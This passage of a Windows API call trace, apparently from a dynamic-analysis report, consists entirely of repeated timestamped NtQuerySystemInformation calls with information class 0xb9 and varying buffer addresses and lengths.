SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc48, Length=0x58, ResultLength=0x0) [0280.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x58, ResultLength=0x0) [0280.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0280.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0280.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0280.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0280.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0280.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x28, ResultLength=0x0) [0280.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0280.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0280.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0280.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0280.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0280.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0280.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0280.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0280.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.563] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0280.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0280.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x58, ResultLength=0x0) [0280.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0280.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0280.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0280.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0280.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0280.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x28, ResultLength=0x0) [0280.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0280.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0280.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0280.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0280.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x20, ResultLength=0x0) [0280.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x20, ResultLength=0x0) [0280.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc770, Length=0x20, ResultLength=0x0) [0280.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x58, ResultLength=0x0) [0280.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0280.573] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0280.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0280.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0280.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x28, ResultLength=0x0) [0280.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x28, ResultLength=0x0) [0280.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0280.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0280.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x28, ResultLength=0x0) [0280.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0280.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0280.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0280.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0280.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x20, ResultLength=0x0) [0280.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x38, ResultLength=0x0) [0280.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x20, ResultLength=0x0) [0280.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0280.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x58, ResultLength=0x0) [0280.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0280.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.581] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0280.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0280.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0280.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc830, Length=0x28, ResultLength=0x0) [0280.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x28, ResultLength=0x0) [0280.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0280.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0280.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0280.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x28, ResultLength=0x0) [0280.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0280.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0280.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc790, Length=0x20, ResultLength=0x0) [0280.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc710, Length=0x20, ResultLength=0x0) [0280.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc710, Length=0x20, ResultLength=0x0) [0280.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc710, Length=0x20, ResultLength=0x0) [0280.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.589] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0280.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0280.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x38, ResultLength=0x0) [0280.590] 